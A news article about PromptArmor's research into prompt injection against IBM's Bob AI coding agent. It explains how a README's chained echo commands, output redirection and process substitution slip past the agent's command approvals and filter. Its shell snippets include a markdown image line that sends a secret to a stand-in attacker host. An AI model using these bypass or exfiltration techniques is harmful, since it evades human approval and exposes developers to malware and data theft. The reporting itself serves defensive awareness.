IBM’s AI Coding Tool Faces Scrutiny Over Command Approval Flaws

Researchers Find IBM’s AI Coding Agent Vulnerable To Prompt Injection Attacks

The420 Web Desk

Security researchers testing a new generation of AI coding agents say that small design choices (how commands are approved, how markdown is rendered, how safeguards are enforced) can quietly open paths to malware execution and data exfiltration, even in tools built with human oversight in mind.

A Coding Assistant Under Scrutiny

When IBM introduced “Bob,” its AI-powered coding agent, the company described it as a development partner that understands a programmer’s intent, repositories, and security standards. Announced last October and still in closed beta, Bob is offered in two forms: a command-line interface and an integrated development environment resembling popular AI-assisted editors.

Before general release, security researchers at PromptArmor began evaluating Bob’s defenses. Their findings, shared with The Register, suggest that the system can be manipulated into executing malware through prompt injection attacks, and that its IDE component is vulnerable to common AI-driven data exfiltration techniques.

The researchers emphasize that the issues do not stem from a single catastrophic flaw, but from how Bob interprets and approves sequences of commands when interacting with untrusted content, such as open-source repositories or developer documentation.

How Benign Commands Turn Malicious

One attack scenario described by PromptArmor centers on the shell's echo command, a normally harmless instruction that prints text to standard output. In the researchers' test case, a markdown file contained a series of echo commands embedded in a README.

The first two commands behaved exactly as expected, triggering Bob to prompt the user for approval. Once approved, Bob offered the option to “always allow” the command in future runs. The third instance, however, used echo as a wrapper to fetch a malicious script.

If a user had previously approved echo to always run, the malicious payload could be downloaded and executed without further consent. Researchers also found that Bob’s agent software failed to detect when multiple subcommands were chained together using the shell’s > redirection operator, allowing entire instruction sets to run under the guise of a single approved command.
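The pattern PromptArmor describes can be sketched with a harmless stand-in. The commands below are hypothetical illustrations, not the researchers' actual payloads: the nested command and the staged script here are benign placeholders for what an attacker would swap in (for example, a curl pipeline fetching a remote script).

```shell
#!/usr/bin/env bash

# What the user sees and approves: a plainly benign echo.
echo "Building project..."

# An echo that smuggles execution: the nested command inside $( )
# runs *before* echo prints anything, so an "always allow" grant
# for echo covers the payload too. Here the payload is a harmless
# `date`, standing in for something like fetching and running a
# remote script.
echo "Build started at $(date)"

# Redirection under an approved command: one "echo" line writes a
# second script to disk, which a later approved step could execute.
echo 'echo pwned' > /tmp/staged.sh
bash /tmp/staged.sh
```

The core problem is that approval attaches to the leading command name (`echo`), while the shell happily evaluates everything nested inside or redirected from that line.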

In practice, PromptArmor said, this could enable attackers to run ransomware, steal credentials, or take control of a developer's machine, all while appearing to comply with Bob's allow-list rules.

Data Exfiltration Without a Click

Beyond command execution, researchers identified what they described as a zero-click data exfiltration risk affecting Bob’s IDE. According to PromptArmor, the IDE renders markdown images in model output using a Content Security Policy that permits outbound network requests.

That behavior can allow attackers to log network endpoints and potentially extract data through pre-fetched JSON schemas, without requiring any direct user interaction. Such vectors, the researchers noted, are increasingly common in AI applications that ingest and render untrusted content.
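The mechanism can be illustrated with a hypothetical fragment of model output. The domain and query parameter below are invented for illustration: if an IDE renders this markdown and its Content Security Policy permits the outbound image request, the data in the URL reaches the attacker's server the moment the pane renders, with no click required.

```shell
# Hypothetical markdown that a compromised or injected model response
# might emit. Rendering the image tag triggers an HTTP GET to the
# attacker-controlled host, carrying the "leaked" value in the URL.
cat <<'EOF'
![status](https://attacker.example/pixel.png?leak=SOME_SECRET_VALUE)
EOF
```

Because the request is issued by the renderer itself, blocking it is a policy decision (restricting which origins images may load from), not something the user can catch in an approval prompt.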

Bob’s own safeguards block some well-known shell techniques, such as command substitution using $(command). But PromptArmor found that the system did not account for process substitution — a gap they traced to a bug in minified JavaScript code underlying the agent’s logic.
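The distinction between the two syntaxes is easy to see side by side. This is a generic bash sketch, not Bob's actual filter logic: both forms execute a nested command, but they look different enough that a pattern match on `$( )` alone misses the second.

```shell
#!/usr/bin/env bash

# Command substitution -- the well-known pattern Bob reportedly blocks.
# The nested echo runs and its output is captured inline.
blocked_form="$(echo 'inline command ran')"

# Process substitution -- the same nested-execution effect via <( ),
# which per PromptArmor the agent's filter did not account for. The
# nested command runs and its output is exposed as a file descriptor.
missed_form="$(cat <(echo 'nested command ran'))"

echo "$blocked_form"
echo "$missed_form"
```

Both lines execute an embedded command; a safeguard that only recognizes the `$( )` spelling treats the second as plain text.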

Warnings, Defenses, and Open Questions

IBM’s documentation acknowledges that AI agents operating with tool access carry inherent risks. The company advises users to rely on explicit allow lists, avoid wildcard characters, and assume that the agent will prompt for approval when potentially dangerous commands arise.

PromptArmor argues that, in Bob’s current form, those assumptions do not always hold. In an email to The Register, the firm’s managing director, Shankar Krishnan, said that the “human in the loop” approval process can end up validating only a surface-level safe command, while more sensitive instructions run underneath.
